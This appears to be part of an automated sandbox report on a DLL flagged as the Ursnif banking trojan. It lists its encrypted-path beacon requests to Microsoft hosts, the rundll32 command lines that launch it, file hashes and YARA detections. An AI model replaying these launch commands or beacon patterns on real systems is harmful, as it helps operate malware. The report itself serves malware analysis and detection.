2021-10-11 20:36:54 UTC | 2 | OUT | GET /signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.com
2021-10-11 20:36:54 UTC | 3 | IN | HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://www.outlook.com/signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre
Server: Microsoft-IIS/10.0
request-id: 0acc84ba-0f33-73c7-d697-d3bbddfdc093
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-FEServer: MWHPR11CA0045
X-RequestId: 7a31cf66-1cf5-44d5-8e06-3f842ed018cd
MS-CV: uoTMCjMPx3PWl9O73f3Akw.0
X-Powered-By: ASP.NET
X-FEServer: MWHPR11CA0045
Date: Mon, 11 Oct 2021 20:36:54 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.7 | 49772 | 40.101.124.210 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:36:54 UTC | 3 | OUT | GET /signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: www.outlook.com
2021-10-11 20:36:54 UTC | 4 | IN | HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://outlook.office365.com/signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre
Server: Microsoft-IIS/10.0
request-id: eb0f8648-c510-3723-7432-6444c8b36785
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-FEServer: AM5PR1001CA0044
X-RequestId: 8aef651c-1dd5-41ea-8e75-391015b5d07d
MS-CV: SIYP6xDFIzd0MmREyLNnhQ.0
X-Powered-By: ASP.NET
X-FEServer: AM5PR1001CA0044
Date: Mon, 11 Oct 2021 20:36:54 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.7 | 49773 | 52.97.223.66 | 443 | C:\Windows\SysWOW64\rundll32.exe
Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:36:54 UTC | 5 | OUT | GET /signup/liopolo/3VnYAYtkPZmdkRft/PhukctoSJxkO8c8/Lye7Mz0DUphRm7HFMS/Ert7vY9a_/2Fh6kZ4AO5iovULa_2Bg/RWwMy2ZM2sR1_2FjWVo/tVrVc9cE14VzsJSo6j4pki/JUlhlBWv0cOdb/WT8dwYTw/fsNrVB4ij0f115XNZnOJrEB/Ph8kPiXFtx/k7Vhu_2FqmJ2l_2BS/kcHYGhIgQQBE/6Lz_2BcD7nm/sGFf8Kc2PZ_2B/1_2F.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.office365.com
2021-10-11 20:36:54 UTC | 5 | IN | HTTP/1.1 404 Not Found
Content-Length: 1245
Content-Type: text/html
Server: Microsoft-IIS/10.0
request-id: 65c8d4ee-587b-c9b1-e6a8-2fcf099847ce
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-CalculatedBETarget: AM6PR04MB5622.EURPRD04.PROD.OUTLOOK.COM
X-BackEndHttpStatus: 404
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 404
MS-CV: 7tTIZXtYscnmqC/PCZhHzg.1
X-Powered-By: ASP.NET
X-FEServer: AS8PR04CA0145
Date: Mon, 11 Oct 2021 20:36:54 GMT
Connection: close
2021-10-11 20:36:54 UTC | 5 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 2f 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 46 69 6c
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.7 | 49774 | 40.97.161.50 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:36:58 UTC | 7 | OUT | GET /signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.com
2021-10-11 20:36:58 UTC | 7 | IN | HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://www.outlook.com/signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre
Server: Microsoft-IIS/10.0
request-id: ddf68228-86cb-32a7-86de-6ed9e1d98ba3
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-FEServer: MWHPR11CA0040
X-RequestId: 87e81b68-f9ec-4d48-b672-c8ec8b40ec82
MS-CV: KIL23cuGpzKG3m7Z4dmLow.0
X-Powered-By: ASP.NET
X-FEServer: MWHPR11CA0040
Date: Mon, 11 Oct 2021 20:36:57 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
6 | 192.168.2.7 | 49775 | 40.101.124.210 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:36:58 UTC | 8 | OUT | GET /signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: www.outlook.com
2021-10-11 20:36:59 UTC | 8 | IN | HTTP/1.1 301 Moved Permanently
Cache-Control: no-cache
Pragma: no-cache
Location: https://outlook.office365.com/signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre
Server: Microsoft-IIS/10.0
request-id: 0d2a2de0-5fed-0dd6-92ba-8fd4ebe6ac98
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-FEServer: AM5PR1001CA0057
X-RequestId: e00e3198-adde-4934-b834-ed1ee1f1dc71
MS-CV: 4C0qDe1f1g2Suo/U6+asmA.0
X-Powered-By: ASP.NET
X-FEServer: AM5PR1001CA0057
Date: Mon, 11 Oct 2021 20:36:58 GMT
Connection: close
Content-Length: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
7 | 192.168.2.7 | 49776 | 52.98.208.114 | 443 | C:\Windows\System32\loaddll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:36:59 UTC | 9 | OUT | GET /signup/liopolo/HeNOXEGhcO/DJiYgDwUOxUtDS_2F/jyyD8scRCvd_/2FyMxtVOaJ3/wtHE98SGLfSVcY/aYMs8f2LumXTliKvTeXJ_/2BDCwHs2R0k_2FBp/TwUdZVU_2BFy7BU/7Kl_2FOBfWpmXbV5T3/HLfF4XU2w/vHhM4pKHjDGx_2BGh5XJ/k3tEoRB4M6D1Hg77dr2/GhhYGYGyvzjf8tA7M4_2Fz/PcKN.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: outlook.office365.com
2021-10-11 20:36:59 UTC | 9 | IN | HTTP/1.1 404 Not Found
Content-Length: 1245
Content-Type: text/html
Server: Microsoft-IIS/10.0
request-id: 4b4aee2f-6f98-79c7-950f-5c79da77b3fe
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-CalculatedBETarget: AM6PR06MB4263.eurprd06.prod.outlook.com
X-BackEndHttpStatus: 404
X-Proxy-RoutingCorrectness: 1
X-Proxy-BackendServerStatus: 404
MS-CV: L+5KS5hvx3mVD1x52nez/g.1
X-Powered-By: ASP.NET
X-FEServer: AS9PR06CA0128
Date: Mon, 11 Oct 2021 20:36:58 GMT
Connection: close
2021-10-11 20:36:59 UTC | 10 | IN | Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>404 - Fil


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
8 | 192.168.2.7 | 49810 | 13.82.28.61 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:37:36 UTC | 11 | OUT | GET /mail/liopolo/BqQVObz8g5lnocL/rDmP1N8TTzvhY7vp6N/RS6H6xMUu/qA1CfJ9oDnQhRUYDGgyu/MnijqTPatYoqwLU2Gjp/CUGc0n_2BeItdu5kr8poMa/AhSBnyUxBLy2z/WL6kh9Er/V_2FntCaBAYN2Q0pmQz73pS/plPX31iyVH/sliN48qRh7bzwYOXL/_2Bf1goPp5sf/LxXLhBSZnu3/MQi2YcecwkM/9zZah40u0/3pu.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: msn.com
2021-10-11 20:37:36 UTC | 11 | IN | HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: https://www.msn.com/mail/liopolo/BqQVObz8g5lnocL/rDmP1N8TTzvhY7vp6N/RS6H6xMUu/qA1CfJ9oDnQhRUYDGgyu/MnijqTPatYoqwLU2Gjp/CUGc0n_2BeItdu5kr8poMa/AhSBnyUxBLy2z/WL6kh9Er/V_2FntCaBAYN2Q0pmQz73pS/plPX31iyVH/sliN48qRh7bzwYOXL/_2Bf1goPp5sf/LxXLhBSZnu3/MQi2YcecwkM/9zZah40u0/3pu.jre
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Mon, 11 Oct 2021 20:37:35 GMT
Connection: close
Content-Length: 395
2021-10-11 20:37:36 UTC | 12 | IN | Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/BqQVObz8g5lnocL/rDmP1N8TTzvhY7vp6N/RS6H6xMUu/qA1CfJ9oDnQhRUYDGgyu/MnijqTPatYoqwLU2Gjp/CUGc0n_2BeItdu5kr8poMa/AhSBnyU


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
9 | 192.168.2.7 | 49812 | 13.82.28.61 | 443 | C:\Windows\SysWOW64\rundll32.exe

Timestamp | kBytes transferred | Direction | Data
2021-10-11 20:37:39 UTC | 12 | OUT | GET /mail/liopolo/ytBZeomNqV/HSfS_2F75u1_2Bgzu/fw3T9nUGqtyA/MnMc49Ew1bU/TR75BNg3t5wK_2/FZ_2BhHpRHjaoiOWsJCdm/IP7BzqL3kfOIwEpd/0v6vAk1XTaQKS4Q/4t76RFSHOBJGuOI3un/dPzfZGf9x/VMluKaNPNp_2BEHsWys0/7w8R7Qn2JCyyYRXwFiA/UZytNi_2F_2BVoKUDorTiy/Fo.jre HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
Host: msn.com
2021-10-11 20:37:39 UTC | 13 | IN | HTTP/1.1 301 Moved Permanently
Content-Type: text/html; charset=UTF-8
Location: https://www.msn.com/mail/liopolo/ytBZeomNqV/HSfS_2F75u1_2Bgzu/fw3T9nUGqtyA/MnMc49Ew1bU/TR75BNg3t5wK_2/FZ_2BhHpRHjaoiOWsJCdm/IP7BzqL3kfOIwEpd/0v6vAk1XTaQKS4Q/4t76RFSHOBJGuOI3un/dPzfZGf9x/VMluKaNPNp_2BEHsWys0/7w8R7Qn2JCyyYRXwFiA/UZytNi_2F_2BVoKUDorTiy/Fo.jre
Server: Microsoft-IIS/8.5
X-Powered-By: ASP.NET
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Date: Mon, 11 Oct 2021 20:37:39 GMT
Connection: close
Content-Length: 379
2021-10-11 20:37:39 UTC | 13 | IN | Data Ascii: <head><title>Document Moved</title></head><body><h1>Object Moved</h1>This document may be found <a HREF="https://www.msn.com/mail/liopolo/ytBZeomNqV/HSfS_2F75u1_2Bgzu/fw3T9nUGqtyA/MnMc49Ew1bU/TR75BNg3t5wK_2/FZ_2BhHpRHjaoiOWsJCdm/IP7BzqL3kfOIwEpd/0v6vAk1X


Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 22:34:21
Start date: 11/10/2021
Path: C:\Windows\System32\loaddll32.exe
Wow64 process (32bit): true
Commandline: loaddll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll'
Imagebase: 0xdc0000
File size: 893440 bytes
MD5 hash: 72FCD8FB0ADC38ED9050569AD673650E
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.484405458.0000000003598000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.484224135.0000000003598000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.483910009.0000000003598000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.484141352.0000000003598000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000003.432941083.0000000000CA0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.619486334.000000000321F000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.774318149.0000000003079000.00000004.00000040.sdmp, Author: Joe Security
• Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.528112034.000000000341B000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.484353267.0000000003598000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.484300889.0000000003598000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.576475056.000000000331D000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.483984504.0000000003598000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.484055425.0000000003598000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.484848144.0000000003598000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.774526618.00000000031A0000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:moderate

                                                                                                                                                                      General

                                                                                                                                                                      Start time:22:34:21
                                                                                                                                                                      Start date:11/10/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:cmd.exe /C rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                                                                                                                                                                      Imagebase:0x870000
                                                                                                                                                                      File size:232960 bytes
                                                                                                                                                                      MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:22:34:22
                                                                                                                                                                      Start date:11/10/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,BeGrass
                                                                                                                                                                      Imagebase:0x9a0000
                                                                                                                                                                      File size:61952 bytes
                                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000002.00000003.391175894.00000000030D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:22:34:22
                                                                                                                                                                      Start date:11/10/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:rundll32.exe 'C:\Users\user\Desktop\6yDD19jMIu.dll',#1
                                                                                                                                                                      Imagebase:0x9a0000
                                                                                                                                                                      File size:61952 bytes
                                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.477730310.0000000004C38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.477283953.0000000004C38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.477436654.0000000004C38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.478270609.0000000004C38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.567583094.00000000049BD000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000002.776401255.0000000004840000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.521826421.0000000004ABB000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.477363484.0000000004C38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.477795801.0000000004C38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.477552233.0000000004C38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.776217854.0000000004579000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.477498453.0000000004C38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.477873003.0000000004C38000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000003.00000003.612038120.00000000048BF000.00000004.00000040.sdmp, Author: Joe Security
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000003.389669380.0000000000700000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:22:34:26
                                                                                                                                                                      Start date:11/10/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Fieldeight
                                                                                                                                                                      Imagebase:0x9a0000
                                                                                                                                                                      File size:61952 bytes
                                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000004.00000003.421383177.0000000000640000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:22:34:34
                                                                                                                                                                      Start date:11/10/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:rundll32.exe C:\Users\user\Desktop\6yDD19jMIu.dll,Often
                                                                                                                                                                      Imagebase:0x9a0000
                                                                                                                                                                      File size:61952 bytes
                                                                                                                                                                      MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                      Yara matches:
                                                                                                                                                                      • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000006.00000003.427656191.00000000033B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                                      Reputation:high

                                                                                                                                                                      General

                                                                                                                                                                      Start time:22:36:04
                                                                                                                                                                      Start date:11/10/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 892 -s 636
                                                                                                                                                                      Imagebase:0x3b0000
                                                                                                                                                                      File size:434592 bytes
                                                                                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      General

                                                                                                                                                                      Start time:22:36:05
                                                                                                                                                                      Start date:11/10/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4040 -s 636
                                                                                                                                                                      Imagebase:0x3b0000
                                                                                                                                                                      File size:434592 bytes
                                                                                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      General

                                                                                                                                                                      Start time:22:36:10
                                                                                                                                                                      Start date:11/10/2021
                                                                                                                                                                      Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                      Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 1820 -s 640
                                                                                                                                                                      Imagebase:0x3b0000
                                                                                                                                                                      File size:434592 bytes
                                                                                                                                                                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                      Programmed in:C, C++ or other language

                                                                                                                                                                      Disassembly

                                                                                                                                                                      Code Analysis
